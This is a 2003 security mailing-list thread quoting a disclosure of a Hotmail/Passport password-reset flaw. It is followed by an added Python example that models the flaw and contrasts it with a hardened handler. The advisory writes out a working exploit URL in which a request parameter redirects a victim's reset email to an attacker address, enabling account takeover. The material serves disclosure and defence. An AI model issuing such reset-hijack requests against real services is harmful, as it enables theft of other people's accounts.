From: xploit at hackermail.com (dong-h0un U)
Subject: Hotmail & Passport (.NET Accounts) Vulnerability


I encountered my mail being hacked by this method.
And looked for a person who hacked it.
This method could not be exhibited easily so.
Thanks for your information. :-)

P.S: Sorry for my poor English.
     Hotmail's engineers desire to solve bug fast.


----- Original Message -----
From: Muhammad Faisal Rauf Danka <mfrd@...itudex.com>
Date: Wed, 7 May 2003 19:50:51 -0700 (PDT) 
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability

> Hotmail & Passport (.NET Accounts) Vulnerability
> 
> There is a very serious and stupid vulnerability or bad coding in Hotmail / Passport's (.NET Accounts)
> 
> I tried sending emails several times to Hotmail / Passport contact addresses, but always met with the NLP bots.
> 
> I guess I don't need to go into details of how crucial and important Hotmail / Passport's .NET Account passport is to anyone.
> 
> You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and what not.
> 
> It is so simple that it is funny.
> 
> All you got to do is hit the following in your browser:
> 
> https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1
> 
> And you'll get an email on attacker@...acker.com asking you to click on a url something like this:
> 
> http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033
> 
> From that url, you can reset the password and I don't think I need to say anything more about it.
> 
> Vulnerability / Flaw discovered 	: 	12th April 2003
> Vendor / Owner notified		:	Yes (as far as emailing them more than 10 times is concerned)
> 
> 
> Regards
> --------
> Muhammad Faisal Rauf Danka
> 
> _____________________________________________________________
> ---------------------------
> [ATTITUDEX.COM]
> http://www.attitudex.com/
> ---------------------------
> 

-- 
_______________________________________________
Get your free email from http://www.hackermail.com
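
An added example, not part of either message and not the vendor's code: a simplified model of the flaw described in the quoted advisory, where the reset mail goes to the address supplied in the `prefem` request parameter, beside a handler that mails only the recovery address already stored for the account. The account store, token handling and function names are assumptions made for illustration; only the parameter names `em` and `prefem` come from the advisory.

```python
import hashlib
import secrets

# Constructed sample data: login address -> recovery address the owner registered.
ACCOUNTS = {"alice@example.com": "alice.backup@example.net"}
RESET_TOKENS = {}  # sha256(token) -> account; only the hash is kept server-side
OUTBOX = []        # stands in for the mail sender: (recipient, token)


def _issue_token(account):
    """Create an unguessable reset token bound to one account."""
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[hashlib.sha256(token.encode()).hexdigest()] = account
    return token


def request_reset_vulnerable(params):
    """Flawed pattern: the reset mail's destination is taken from the request."""
    account = params["em"]
    if account not in ACCOUNTS:
        return False
    OUTBOX.append((params["prefem"], _issue_token(account)))
    return True


def request_reset_hardened(params):
    """Ignore any client-supplied destination; mail the stored recovery address."""
    account = params.get("em", "")
    recovery = ACCOUNTS.get(account)
    if recovery is not None:
        OUTBOX.append((recovery, _issue_token(account)))
    # Same answer whether or not the account exists, so the endpoint
    # cannot be used to enumerate accounts.
    return True


def redeem(token):
    """Single use: return the account for a valid token, then invalidate it."""
    return RESET_TOKENS.pop(hashlib.sha256(token.encode()).hexdigest(), None)
```

A useful regression test for any reset endpoint is the one this models: submit a request carrying an extra address parameter and assert that the outgoing mail still goes only to the address on file.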
